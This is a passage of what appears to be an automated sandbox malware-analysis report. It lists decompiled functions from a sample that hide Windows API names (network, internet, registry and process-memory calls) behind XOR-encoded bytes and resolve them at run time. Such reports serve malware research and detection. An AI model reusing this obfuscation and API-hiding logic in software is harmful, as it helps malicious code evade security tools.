                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				intOrPtr* _t26;
                                                                    				void* _t27;
                                                                    				void* _t29;
                                                                    				CHAR* _t36;
                                                                    
                                                                    				_t26 =  *0x447ff0;
                                                                    				if(_t26 == 0) {
                                                                    					_v15 = 0xf8;
                                                                    					_v6 = 0xf8;
                                                                    					 *_t36 = 0xdb;
                                                                    					_v23 = 0xdf;
                                                                    					_v22 = 0xcd;
                                                                    					_v21 = 0xc9;
                                                                    					_v20 = 0xe2;
                                                                    					_v19 = 0xf9;
                                                                    					_v18 = 0xe1;
                                                                    					_v17 = 0xc2;
                                                                    					_v16 = 0xe9;
                                                                    					_v14 = 0xfb;
                                                                    					_v13 = 0xe3;
                                                                    					_v12 = 0xfe;
                                                                    					_v11 = 0xe7;
                                                                    					_v10 = 0xc9;
                                                                    					_v9 = 0xfa;
                                                                    					_v8 = 0xe9;
                                                                    					_v7 = 0xe2;
                                                                    					_v5 = 0xff;
                                                                    					_v4 = 0x8c;
                                                                    					_t29 = 0;
                                                                    					do {
                                                                    						 *(_t36 + _t29) =  *(_t36 + _t29) ^ 0x0000008c;
                                                                    						_t29 = _t29 + 1;
                                                                    					} while (_t29 < 0x15);
                                                                    					_t26 = E0041DA50(_t36);
                                                                    					 *0x447ff0 = _t26;
                                                                    				}
                                                                    				_t27 =  *_t26(_a4, _a8, _a12); // executed
                                                                    				return _t27;
                                                                    			}



























                                                                    0x0041e270
                                                                    0x0041e27a
                                                                    0x0041e286
                                                                    0x0041e28a
                                                                    0x0041e28e
                                                                    0x0041e292
                                                                    0x0041e297
                                                                    0x0041e29c
                                                                    0x0041e2a1
                                                                    0x0041e2a5
                                                                    0x0041e2aa
                                                                    0x0041e2af
                                                                    0x0041e2b4
                                                                    0x0041e2b8
                                                                    0x0041e2bd
                                                                    0x0041e2c2
                                                                    0x0041e2c7
                                                                    0x0041e2cc
                                                                    0x0041e2d1
                                                                    0x0041e2d6
                                                                    0x0041e2da
                                                                    0x0041e2de
                                                                    0x0041e2e3
                                                                    0x0041e2e8
                                                                    0x0041e2f0
                                                                    0x0041e2f0
                                                                    0x0041e2f4
                                                                    0x0041e2f5
                                                                    0x0041e2fe
                                                                    0x0041e306
                                                                    0x0041e306
                                                                    0x0041e31a
                                                                    0x0041e31f

                                                                    APIs
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?,00000000,00000000,00000000), ref: 0041E31A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: EnumEventsNetwork
                                                                    • String ID:
                                                                    • API String ID: 1334179165-0
                                                                    • Opcode ID: 0cd080932fbd6f0a8f3fda96ebcc919a6cb3dde027a7795824812cc5bda7d6d5
                                                                    • Instruction ID: 780d0a54b90bd9d1fa6b18e8aa1175898e64c28a668536fe4e36361ef0713c72
                                                                    • Opcode Fuzzy Hash: 0cd080932fbd6f0a8f3fda96ebcc919a6cb3dde027a7795824812cc5bda7d6d5
                                                                    • Instruction Fuzzy Hash: A811B42500C7C299C322DB7D584884FBE915AA7234F588F9DF4F98B2E2D224860AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B6C0(struct HINSTANCE__* _a4, CHAR* _a8, long _a12) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				long _t25;
                                                                    				void* _t27;
                                                                    				CHAR* _t34;
                                                                    
                                                                    				if( *0x447e78 == 0) {
                                                                    					_v19 = 0xf5;
                                                                    					_v12 = 0xf5;
                                                                    					_v8 = 0xf5;
                                                                    					_v4 = 0xf5;
                                                                    					 *_t34 = 0xd7;
                                                                    					_v18 = 0xe4;
                                                                    					_v17 = 0xdd;
                                                                    					_v16 = 0xff;
                                                                    					_v15 = 0xf4;
                                                                    					_v14 = 0xe5;
                                                                    					_v13 = 0xfc;
                                                                    					_v11 = 0xd6;
                                                                    					_v10 = 0xf9;
                                                                    					_v9 = 0xfc;
                                                                    					_v7 = 0xde;
                                                                    					_v6 = 0xf1;
                                                                    					_v5 = 0xfd;
                                                                    					_v3 = 0xd1;
                                                                    					_v2 = 0x90;
                                                                    					_t27 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t27) =  *(_t34 + _t27) ^ 0x00000090;
                                                                    						_t27 = _t27 + 1;
                                                                    					} while (_t27 < 0x13);
                                                                    					 *0x447e78 = E0041A600(_t34);
                                                                    				}
                                                                    				_t25 = GetModuleFileNameA(_a4, _a8, _a12); // executed
                                                                    				return _t25;
                                                                    			}
























                                                                    0x0041b6ca
                                                                    0x0041b6d0
                                                                    0x0041b6d4
                                                                    0x0041b6d8
                                                                    0x0041b6dc
                                                                    0x0041b6e0
                                                                    0x0041b6e4
                                                                    0x0041b6e9
                                                                    0x0041b6ee
                                                                    0x0041b6f3
                                                                    0x0041b6f8
                                                                    0x0041b6fd
                                                                    0x0041b701
                                                                    0x0041b706
                                                                    0x0041b70b
                                                                    0x0041b70f
                                                                    0x0041b714
                                                                    0x0041b719
                                                                    0x0041b71e
                                                                    0x0041b723
                                                                    0x0041b728
                                                                    0x0041b730
                                                                    0x0041b730
                                                                    0x0041b734
                                                                    0x0041b735
                                                                    0x0041b746
                                                                    0x0041b746
                                                                    0x0041b75a
                                                                    0x0041b75f

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNELBASE(?,?,?,?,00413CE5,00000000,?,00000104), ref: 0041B75A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 514040917-0
                                                                    • Opcode ID: 002f815f93453f52ae6a0a4b8791f2d4210641b83825172a82758f28b6632f08
                                                                    • Instruction ID: 8b41fe482314ead0075feb0741a53ad0e3922794e95b49149e99d00c5a4fa99a
                                                                    • Opcode Fuzzy Hash: 002f815f93453f52ae6a0a4b8791f2d4210641b83825172a82758f28b6632f08
                                                                    • Instruction Fuzzy Hash: C511946100C7C69EC322DB7C884494FBF955AA7130F18CB9DF4F98A2E6E624C54AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D5F0(char* _a4, long _a8, char* _a12, char* _a16, long _a20) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t34;
                                                                    
                                                                    				if( *0x447f94 == 0) {
                                                                    					_v13 = 0xef;
                                                                    					_v10 = 0xef;
                                                                    					_v6 = 0xef;
                                                                    					 *_t34 = 0xc3;
                                                                    					_v15 = 0xe4;
                                                                    					_v14 = 0xfe;
                                                                    					_v12 = 0xf8;
                                                                    					_v11 = 0xe4;
                                                                    					_v9 = 0xfe;
                                                                    					_v8 = 0xc5;
                                                                    					_v7 = 0xfa;
                                                                    					_v5 = 0xe4;
                                                                    					_v4 = 0xcb;
                                                                    					_v3 = 0x8a;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t24) =  *(_t34 + _t24) ^ 0x0000008a;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xe);
                                                                    					 *0x447f94 = E0041D440(_t34);
                                                                    				}
                                                                    				_t22 = InternetOpenA(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t22;
                                                                    			}



















                                                                    0x0041d5fa
                                                                    0x0041d602
                                                                    0x0041d606
                                                                    0x0041d60a
                                                                    0x0041d60e
                                                                    0x0041d612
                                                                    0x0041d616
                                                                    0x0041d61a
                                                                    0x0041d61f
                                                                    0x0041d623
                                                                    0x0041d627
                                                                    0x0041d62c
                                                                    0x0041d631
                                                                    0x0041d635
                                                                    0x0041d63a
                                                                    0x0041d63f
                                                                    0x0041d641
                                                                    0x0041d641
                                                                    0x0041d645
                                                                    0x0041d646
                                                                    0x0041d657
                                                                    0x0041d657
                                                                    0x0041d675
                                                                    0x0041d67a

                                                                    APIs
                                                                    • InternetOpenA.WININET(?,?,?,?,?), ref: 0041D675
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID:
                                                                    • API String ID: 2038078732-0
                                                                    • Opcode ID: b050039bcea6e325e568533ce2e4df03b0e0a11e3c3768b58304bcc8023ae794
                                                                    • Instruction ID: a91272388a1a841bb11c144cd15e23a95a6ccff5523bc014646451530ede3228
                                                                    • Opcode Fuzzy Hash: b050039bcea6e325e568533ce2e4df03b0e0a11e3c3768b58304bcc8023ae794
                                                                    • Instruction Fuzzy Hash: C71118A110D3C1AEC311D77C984085BBFD56AEA124F08CF9DF0E887292D234C545CB27
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C090(void* _a4, long _a8, LONG* _a12, long _a16) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t33;
                                                                    
                                                                    				if( *0x447eb8 == 0) {
                                                                    					_v15 = 0x88;
                                                                    					_v10 = 0x88;
                                                                    					_v4 = 0x88;
                                                                    					 *_t33 = 0xbe;
                                                                    					_v14 = 0x99;
                                                                    					_v13 = 0xab;
                                                                    					_v12 = 0x84;
                                                                    					_v11 = 0x81;
                                                                    					_v9 = 0xbd;
                                                                    					_v8 = 0x82;
                                                                    					_v7 = 0x84;
                                                                    					_v6 = 0x83;
                                                                    					_v5 = 0x99;
                                                                    					_v3 = 0x9f;
                                                                    					_v2 = 0xed;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t33 + _t24) =  *(_t33 + _t24) ^ 0x000000ed;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xf);
                                                                    					 *0x447eb8 = E0041A600(_t33);
                                                                    				}
                                                                    				_t22 = SetFilePointer(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t22;
                                                                    			}




















                                                                    0x0041c09a
                                                                    0x0041c0a2
                                                                    0x0041c0a6
                                                                    0x0041c0aa
                                                                    0x0041c0ae
                                                                    0x0041c0b2
                                                                    0x0041c0b6
                                                                    0x0041c0bb
                                                                    0x0041c0bf
                                                                    0x0041c0c4
                                                                    0x0041c0c9
                                                                    0x0041c0ce
                                                                    0x0041c0d2
                                                                    0x0041c0d7
                                                                    0x0041c0db
                                                                    0x0041c0e0
                                                                    0x0041c0e5
                                                                    0x0041c0e7
                                                                    0x0041c0e7
                                                                    0x0041c0eb
                                                                    0x0041c0ec
                                                                    0x0041c0fd
                                                                    0x0041c0fd
                                                                    0x0041c116
                                                                    0x0041c11b

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,00000000,?,00000104,?), ref: 0041C116
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d09d72c0fe97900f497ffc031c45929d41649a75de740c762639a865563cd3b0
                                                                    • Instruction ID: 05be4228a32d6350187c95ccadfccda271afa3a1005272b1ef42bb1b614fd13a
                                                                    • Opcode Fuzzy Hash: d09d72c0fe97900f497ffc031c45929d41649a75de740c762639a865563cd3b0
                                                                    • Instruction Fuzzy Hash: 4C11B36210C7C2AEC312DB7C888444BBF9559A6224F58CB9DF0F9872E2D2748546D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041E1E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t21;
                                                                    				void* _t23;
                                                                    				CHAR* _t32;
                                                                    
                                                                    				_t20 =  *0x447fec;
                                                                    				if(_t20 == 0) {
                                                                    					_v7 = 0x8a;
                                                                    					_v6 = 0x8a;
                                                                    					 *_t32 = 0xb3;
                                                                    					_v11 = 0xb7;
                                                                    					_v10 = 0xa5;
                                                                    					_v9 = 0xa7;
                                                                    					_v8 = 0x8b;
                                                                    					_v5 = 0x81;
                                                                    					_v4 = 0x87;
                                                                    					_v3 = 0x90;
                                                                    					_v2 = 0xe4;
                                                                    					_t23 = 0;
                                                                    					do {
                                                                    						 *(_t32 + _t23) =  *(_t32 + _t23) ^ 0x000000e4;
                                                                    						_t23 = _t23 + 1;
                                                                    					} while (_t23 < 0xb);
                                                                    					_t20 = E0041DA50(_t32);
                                                                    					 *0x447fec = _t20;
                                                                    				}
                                                                    				_t21 =  *_t20(_a4, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t21;
                                                                    			}

















                                                                    0x0041e1e0
                                                                    0x0041e1ea
                                                                    0x0041e1ee
                                                                    0x0041e1f2
                                                                    0x0041e1f6
                                                                    0x0041e1fa
                                                                    0x0041e1ff
                                                                    0x0041e204
                                                                    0x0041e209
                                                                    0x0041e20e
                                                                    0x0041e213
                                                                    0x0041e218
                                                                    0x0041e21d
                                                                    0x0041e222
                                                                    0x0041e224
                                                                    0x0041e224
                                                                    0x0041e228
                                                                    0x0041e229
                                                                    0x0041e232
                                                                    0x0041e23a
                                                                    0x0041e23a
                                                                    0x0041e262
                                                                    0x0041e267

                                                                    APIs
                                                                    • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0041E262
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Connect
                                                                    • String ID:
                                                                    • API String ID: 3144859779-0
                                                                    • Opcode ID: 6341883ed8bd22b49c2061b1034a2f830521753bd2a3db685501bdea37013e01
                                                                    • Instruction ID: 75fd7502578123a63774c32350cd16df935d91ed4a3dd1e509c8f6957cf94e41
                                                                    • Opcode Fuzzy Hash: 6341883ed8bd22b49c2061b1034a2f830521753bd2a3db685501bdea37013e01
                                                                    • Instruction Fuzzy Hash: 0C115A6110C782AAC311DB7D9944C0BBBE55AEA624F04CB9CF0E9872E2D320D906C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041BC70(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t23;
                                                                    				void* _t25;
                                                                    				CHAR* _t33;
                                                                    
                                                                    				if( *0x447e9c == 0) {
                                                                    					_v10 = 0x9d;
                                                                    					_v8 = 0x9d;
                                                                    					_v7 = 0x9d;
                                                                    					 *_t33 = 0xa7;
                                                                    					_v15 = 0x98;
                                                                    					_v14 = 0x83;
                                                                    					_v13 = 0x85;
                                                                    					_v12 = 0x84;
                                                                    					_v11 = 0x90;
                                                                    					_v9 = 0xb0;
                                                                    					_v6 = 0x9e;
                                                                    					_v5 = 0x92;
                                                                    					_v4 = 0xb4;
                                                                    					_v3 = 0x89;
                                                                    					_v2 = 0xf1;
                                                                    					_t25 = 0;
                                                                    					do {
                                                                    						 *(_t33 + _t25) =  *(_t33 + _t25) ^ 0x000000f1;
                                                                    						_t25 = _t25 + 1;
                                                                    					} while (_t25 < 0xf);
                                                                    					 *0x447e9c = E0041A600(_t33);
                                                                    				}
                                                                    				_t23 = VirtualAllocEx(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t23;
                                                                    			}




















                                                                    0x0041bc7a
                                                                    0x0041bc7e
                                                                    0x0041bc82
                                                                    0x0041bc86
                                                                    0x0041bc8a
                                                                    0x0041bc8e
                                                                    0x0041bc93
                                                                    0x0041bc98
                                                                    0x0041bc9d
                                                                    0x0041bca2
                                                                    0x0041bca7
                                                                    0x0041bcac
                                                                    0x0041bcb1
                                                                    0x0041bcb6
                                                                    0x0041bcbb
                                                                    0x0041bcc0
                                                                    0x0041bcc5
                                                                    0x0041bcc7
                                                                    0x0041bcc7
                                                                    0x0041bccb
                                                                    0x0041bccc
                                                                    0x0041bcdd
                                                                    0x0041bcdd
                                                                    0x0041bcfb
                                                                    0x0041bd00

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?,00000000,?), ref: 0041BCFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: f84811b731392c57feab3e1aa626f71e3b3bbc54133aae65698a6029451e848e
                                                                    • Instruction ID: b85f8434503158bfed190d1a02104f5cee4dd2a76da96e2db7533693bc9c8603
                                                                    • Opcode Fuzzy Hash: f84811b731392c57feab3e1aa626f71e3b3bbc54133aae65698a6029451e848e
                                                                    • Instruction Fuzzy Hash: 5711D46111C7C2AEC322DB7D884481BBFD569AA134F18CB9DB1F8862E6D224C506D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C690(void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t32;
                                                                    
                                                                    				if( *0x447efc == 0) {
                                                                    					_v15 = 0xf6;
                                                                    					_v11 = 0xf6;
                                                                    					_v8 = 0xf6;
                                                                    					 *_t32 = 0xc1;
                                                                    					_v14 = 0xf4;
                                                                    					_v13 = 0xdc;
                                                                    					_v12 = 0xe3;
                                                                    					_v10 = 0xfd;
                                                                    					_v9 = 0xd8;
                                                                    					_v7 = 0xea;
                                                                    					_v6 = 0xd6;
                                                                    					_v5 = 0xeb;
                                                                    					_v4 = 0xd2;
                                                                    					_v3 = 0x93;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t32 + _t24) =  *(_t32 + _t24) ^ 0x00000093;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xe);
                                                                    					 *0x447efc = E0041C580(_t32);
                                                                    				}
                                                                    				_t22 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t22;
                                                                    			}



















                                                                    0x0041c69a
                                                                    0x0041c69e
                                                                    0x0041c6a2
                                                                    0x0041c6a6
                                                                    0x0041c6aa
                                                                    0x0041c6ae
                                                                    0x0041c6b3
                                                                    0x0041c6b8
                                                                    0x0041c6bd
                                                                    0x0041c6c2
                                                                    0x0041c6c7
                                                                    0x0041c6cc
                                                                    0x0041c6d1
                                                                    0x0041c6d6
                                                                    0x0041c6db
                                                                    0x0041c6e0
                                                                    0x0041c6e2
                                                                    0x0041c6e2
                                                                    0x0041c6e6
                                                                    0x0041c6e7
                                                                    0x0041c6f8
                                                                    0x0041c6f8
                                                                    0x0041c716
                                                                    0x0041c71b

                                                                    APIs
                                                                    • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,00000000,00447B68,?,00000001), ref: 0041C716
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: 6fd00bfad990c8c8a579b9d4fff664709d32074f0ed0b92c335179756fb5eedd
                                                                    • Instruction ID: 26c7d7a95667f7ba8f436c89eb1e81bf1351e27a682cbb78cc27659482a41c2b
                                                                    • Opcode Fuzzy Hash: 6fd00bfad990c8c8a579b9d4fff664709d32074f0ed0b92c335179756fb5eedd
                                                                    • Instruction Fuzzy Hash: CD11F26110C7C2AEC321DB7D884485FBFD56AE6224F18CB9DF0F9962E2E224C506C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041DFB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr* _t19;
                                                                    				void* _t20;
                                                                    				void* _t22;
                                                                    				CHAR* _t31;
                                                                    
                                                                    				_t19 =  *0x447fdc;
                                                                    				if(_t19 == 0) {
                                                                    					_v10 = 0xb4;
                                                                    					_v3 = 0xb4;
                                                                    					 *_t31 = 0xa2;
                                                                    					_v11 = 0xa6;
                                                                    					_v9 = 0xa6;
                                                                    					_v8 = 0x9a;
                                                                    					_v7 = 0x96;
                                                                    					_v6 = 0x9e;
                                                                    					_v5 = 0x90;
                                                                    					_v4 = 0x81;
                                                                    					_v2 = 0xf5;
                                                                    					_t22 = 0;
                                                                    					do {
                                                                    						 *(_t31 + _t22) =  *(_t31 + _t22) ^ 0x000000f5;
                                                                    						_t22 = _t22 + 1;
                                                                    					} while (_t22 < 0xb);
                                                                    					_t19 = E0041DA50(_t31);
                                                                    					 *0x447fdc = _t19;
                                                                    				}
                                                                    				_t20 =  *_t19(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t20;
                                                                    			}

















                                                                    0x0041dfb0
                                                                    0x0041dfba
